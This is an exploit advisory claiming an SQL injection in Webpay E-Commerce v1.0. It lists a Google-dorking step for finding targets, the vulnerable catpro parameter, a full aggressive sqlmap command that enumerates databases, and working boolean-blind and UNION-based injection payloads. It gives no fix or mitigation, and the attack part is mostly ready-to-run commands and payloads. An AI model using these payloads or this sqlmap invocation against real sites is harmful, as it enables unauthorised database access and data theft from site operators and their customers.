=============================================================================================================================================
| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |
| # Vendor    : http://webpay.com.np/                                                                                                       |
=============================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] use payload : catproduct.php?catpro=6

[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

[+] Parameter: catpro (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catpro=6' AND 5853=5853-- KEle

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================